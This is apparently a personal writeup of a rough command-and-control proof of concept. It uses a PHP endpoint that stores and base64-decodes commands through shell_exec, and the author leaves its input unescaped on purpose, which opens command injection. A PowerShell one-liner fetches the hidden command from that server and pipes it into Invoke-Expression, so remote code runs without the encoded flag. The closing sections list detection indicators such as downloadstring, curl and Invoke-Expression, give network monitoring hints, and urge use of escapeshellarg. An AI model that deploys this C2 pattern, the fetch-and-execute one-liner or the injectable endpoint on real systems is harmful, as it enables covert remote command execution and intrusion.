# Very loose project to bypass '-encoded' command in Powershell
# ... and C2

# Why
Dicussion with some work pals led me thinking how one could skip the -encoded argument powershell

I was thinking if you could offload it to something on the network, then it would make it harder to trace and see what's going on

Lets use our favoutite, PHP with shell_exec()
***

***Please only run this on a test system***

**Why?** - Well, I am not escaping any args (for good reason if PHP would filter our naughtyness if you use the option to set a new command)

This means a user could **easily** run RCEs.

Basically don't run this server on anything you hold dear. 
***

## Lets get to it
Anyway, a quick and hacky php block gives this functionality pretty much with base64

```
<?php

//do ?d=base64 to decode
//do ?e=string to encode
//do ?c=get to get base64 command from txt file
//do ?r=newcommand to set new command

if ($_GET['d']){
    $d_str = $_GET['d'];
    echo shell_exec("echo $d_str | base64 -d");

} elseif ($_GET['e']) {
    $e_str = $_GET['e'];
    echo shell_exec("echo $e_str | base64");


//option to add commands or to read current in file
} elseif ($_GET['c']) {
    if ($_GET['c'] === "get") {
        echo shell_exec("cat command.txt | base64 ");
    } 


} elseif ($_GET['r']) {
        //testing to see if we could update our command also
        $com=$_GET['r'];
        shell_exec("echo $com > command.txt ");
        echo "done";
}

?>
```

You can run a webserver with this if you have php installed with 
```
php -S localhost:8000
```


## Does it work? 
Well, yes. For example, having tested in powershell the following on a Mac we do get the correct behaviour 
```
$e=(curl -s http://localhost:8000/apidecode.php?c=get) ; curl -s http://localhost:8000/apidecode.php?d=$e | Invoke-Expression
```

From the above, you would have no idea the command executed was `whoami` 

* ```c=get``` gets the latest c2 command, spits out in base64
* ```d=$e``` takes our base64 and then decodes it into the full command

As mentioned, all the decode is handled on the server side

(The same could easily be adapted for bash and the likes to hide the base64 command being used)


## Detection
 - Stop your users from being able to run cmd and powershell would help... 

 - On a more serious note, this is very rudemtal and simple and there are a fair few tools that would probably pick this up. 

 - Let's be honest, if you're running powershell why do you need Invoke-Expression in a 1-liner if you're using legitimately? I have actually discovered that the documentation even mentions this!  

 - Also, in your one liner you've got the ```$e(...)``` which goes a runs a subprocess. Kinda easy to spot. 

- Any PS command that involves going to a webserver? Some things worth looking into
... ```curl``` and ```wget``` and ```iex (new-object net.webclient).downloadstring``` pretty good indicator(s) something isn't quite right

- Lastly, if you run this over HTTP, as I did, then the URI will be full of garbage. For example, ```whoami``` translates to ```d2hvYW1pCg==``` which you post back to the server in the 2nd part of the command. Leaves the question of why would anybody be passing base64 in HTTP GETs, if you're doing network monitoring. Haven't tested but pretty certain snort ```Sid 1-23018``` would have got this


## Summary
It's not anything new to base64 encode. It's just obscuring what the command will actually do. I do quite like that it loads a blank page, it's healthy reminder that maliciousness isn't always obvious

Will probably get blocked anyway when you actually start running on the CLI because lots of tools will see this as WRONG. Quite common tactic to get payloads, as a result a lot of effort is focussed on detection of activity like the above. A simple inspection of the command to see if it had ```Invoke-Expression``` would be enough and believe a certain MS product (no names) does this already

Don't run this unless testing for stuff

Lastly, if you do use shell_exec in PHP for prod stuff **plleeeeeassse** use ```escapeshellarg();```


